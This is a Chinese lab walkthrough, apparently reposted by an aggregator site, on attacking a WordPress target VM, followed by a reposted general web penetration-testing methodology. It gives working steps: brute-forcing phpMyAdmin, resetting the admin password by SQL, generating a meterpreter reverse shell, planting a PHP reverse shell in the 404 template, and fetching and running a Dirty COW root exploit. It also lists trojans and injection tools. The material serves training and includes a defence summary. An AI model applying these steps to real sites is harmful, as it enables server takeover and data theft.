渗透---WordPress网站

Posted aidy

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了渗透---WordPress网站相关的知识,希望对你有一定的参考价值。

WordPress简介
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统( CMS )来使用。
WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用户可以在支持 PHP 和 MySQL数据库的服务器上使用自己的博客。

第一步,信息收集

(1)主机发现:arp-scan -l  查看同一局域网下的主机

主机发现也采用 arp-scan、netdiscover、fping等工具

 

(2)端口扫描:使用namp对发现的主机IP进行扫描

命令:nmap -sS -SV -p- -v -T4 靶机IP

 (3)dirb目录遍历

目录扫描工具还有:dirb、dirbuster、gobuster、御剑

寻找敏感文件//

例如找到了phpmyadmin的mysql数据库登陆页面,以及wp-admin管理员登陆页面

进入mysql数据库:

方法一:使用弱口令登陆,默认下未修改的账号/密码可尝试登陆:root

方法二:使用phpmyadmin多线程批量破解工具进行爆破

 在成功破解到密码后,我们发现可以修改。或者添加用户。我们为登陆的用户进行修改 ps:因为密码经过了MD5等格式的加密,不容易破解,我们为了方便可以进行修改密码

 为了方便wp-admin管理员页面顺利登陆我们可以修改密码

例如:我们将密码重新设置为‘123456’:

update wp-users set user_pass=md5("123456") where user_login= \'cleverbao\';

 因为靶场问题:些许靶机部分数据段字段,例如wp的ip地址需要进行修改,才能完成此实验

将后面改成自己kali的地址

 在一系列的操作完成后,我们就可以正常的去登陆后逃跑://靶机ip/wp-admin,输入账号密码。进入后台

 第二步,权限提升

 

生成shell

方法一:利用MSF生成反弹shell:msfvenom -p php/meterpreter/reverse_tcp(生成一个webshell的类型) LHOST=Kali的IP LPORT=4444(监听端口) -o Desktop/shell.php

一旦网站执行了上传的马,我们将有控制网站的权利

方法二:

利用kali Linux自带的反弹shell

终端输入:cat /usr/share/webshells/php/php-reverse-shell.php查找木马代码

复制此shell代码到404模版,修改IP为kali地址,端口为4444

 点击外观,选择里面的编辑,选择404模版,将代码复制到404模版插入反弹shell

 获取shell

使用netcat,类似于中国菜刀,监听4444端口:nc -nlvp 4444

 

浏览器访问不存在的页面,触发404文件执行,例如http://靶机ip/?p=666

 使用命令whoami,查看当前权限

如果当前权限不是root权限需要进行提权

注:$代表一般用户权限,#代表root权限

使用命令:uname -a  // 可以查看当前系统的内核

 权限提升-漏洞概述

 

漏洞原理
Linux内核的内存子系统在处理写入时复制(copy-on-write,COW)时产生了竞争条件(race condition )。恶意用户可利用此漏洞,来获取高杠限,对只读内存映射进行写访问
竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限.

 下载漏洞到kali,发现代码是使用c语言编写的,我们到kali里面就需要用到gcc工具去编译

 下载到kali桌面并进入目录,

使用gcc编译:gcc -pthread dirty.c(文件) -o(输出) dirt(生成该工具文件) -lcrypt

我们需要该文件工具具有执行的权限:ls -l dirt    chmod +x dirty

使用python开启http服务器

python -m SimpleHTTPServer 80

 靶场那边则需要通过反弹的shell,进入靶机/tmp目录,使用wget下载dirty文件

命令为:wget http://kali的IP/dirty

 执行dirty完成提权,获得登陆信息

命令:./dirty new_password(任意密码)

 

3.3 思路总结 - 渗透全过程(红队 )
主机发现,扫描和识别端口服务,找到22、80、3306

目录扫描,找到敏感目录,包括数据库和网站后台

手工尝试登录数据库后台,修改网站账号密码

利用网站账号登录网站后台,上传网站木马( shell )

执行网站木马获取低权限shell,判断系统版本寻找提权方法

使用Dirty Cow 漏洞提权,获取管理员账号实现Root 权限

 

3.3 思路总结 - 防御全过程(蓝队 )
关闭不需要的端口,遵循最小化原则
使用常见网站CMS时,修改默认后台路径
使用PhpmyAdmin时,修改默认路径和密码
升级操作系统版本,不定时打补丁修复漏洞
关注最新漏洞情报,提升安全运维响应能力

 

3.3 思路总结-渗透工具汇总
主机扫描 : nmap、arp-scan、netdiscover

目录遍历 : dirb、dirbuster、gobuster、御剑

漏洞挖掘与利用: phpmyadmin、burp、msf、netcat

权限提升:dirty cow、gcc

 

带验证码的表单爆破工具:pkav

Web渗透是怎么弄的?

1.渗透目标
渗透网站(这里指定为www.xxx.com)
切记,在渗透之前要签订协议。
2.信息收集
建议手动检查和扫描器选择同时进行。
2.1 网站常规检测(手动)
1:浏览www.xxx.com
1. 初步确定网站的类型:例如银行,医院,政府等。
2. 查看网站功能模,比如是否有论坛,邮箱等。
3. 重点记录网站所有的输入点(与数据库交互的页面),比如用户登录,用户注册,留言板等。4. 重点查看网站是否用到了一些通用的模板,比如论坛选择了动网(dvbss),就有可能存在动网的漏洞;邮箱有可能选择通用的邮箱系统,也有漏洞。
2: 分析网站的url1. 利用搜索引擎,搜索网站的url,快速找到网站的动态页面。
2. 对网站的域名进行反查,查看IP,确定服务器上的域名数,如果主页面url检测没有漏洞,可以对其他的域名进行检测。
3:审查代码
重点对输入代码(比如表单)进行分析,看如何来提交输入,客户端做了哪些输入的限制方法。
1. 隐藏表单字段 hidden
2. Username,Password等
4:控件分析
Active x 通常都是用c/c++编写
在页面上(通常是首页)的源码中搜索
1. 需要ComRaider+OD 对dll文件进行反编译,看是否有漏洞。
2. 改变程序执行的路径,破坏Active X 实施的输入确认,看web的回应。
5:对常规的输入进行手动注入测试,测试是否有sql注入和跨站漏洞,试用常规的用户名和密码登录。
6:查看web服务器的版本,确定搜索是否有低版本服务器组件和框架的漏洞,比如通用的Java框架Struct2的漏洞。
2.2 工具选择和使用
1:web应用程序漏洞扫描工具
Appscan: (版本7.8)
扫描漏洞比较全,中文,漏洞利用率高,检测速度慢,需要大量内存,重点推荐。
AWVS:
英文,漏洞库完善,检测速度慢。
JSky
中文,检测速度快,但深度一般。
Nessus
英文,检测速度较快,漏洞也比较完善,免费,可及时更新,B/S界面。
2:端口扫描
Nmap
流光
3: 口令破解工具
溯雪
4:sql 注入工具
Asp+SqlServe, ACCESS:啊D注入工具
Php+MySQL : php+mysql注入工具(暗组的hacker栏中)
Jsp+ORACAL: CnsaferSI
支持以上数据库 Pangolin
5: http代理请求
Paros
6:木马
灰鸽子
7:提权木马
一句话木马大马(具体所用的木马参考文档和工具包(绿盟,暗组))
5: 工具推荐使用方案
Appscan扫描出的重大漏洞,进行手工检测(注意看漏洞是如何发现的,修改漏洞的代码,对渗透帮助很大)。
sql注入漏洞
可以选用根据网站类型选择sql注入工具
如果是post请求类型的url,选择使用paros代理后,修改http请求包,进行注入。
WebDEV漏洞
可以启用发送请求(比如DELETE对方网页)
跨站漏洞
直接将appscan的代码输入测试,成功后,可以尝试跨其他脚本(比如
遍历漏洞:
网页的目录,下载网站配置文件信息,和源文件进行反编译
反编译:
Class 可以选用java 反编译工具
Dll (asp.net) 选用Reflector
3.分析并渗透
---------------------
作者:centos2015
来源:CSDN
原文:https://blog.csdn.net/zonghua521/article/details/78272634
版权声明:本文为博主原创文章,转载请附上博文链接!
参考技术A 常见的就是sql注入,当然首先要找到漏洞。

以上是关于渗透---WordPress网站的主要内容,如果未能解决你的问题,请参考以下文章

XSS结合JSONP获取网站访客社交账号信息

工具传送门(持续更新)

[渗透测试]HTB靶机-Shield

Web渗透是怎么弄的?

网站渗透测试用啥工具好

渗透测试—10个学习渗透测试的网站整理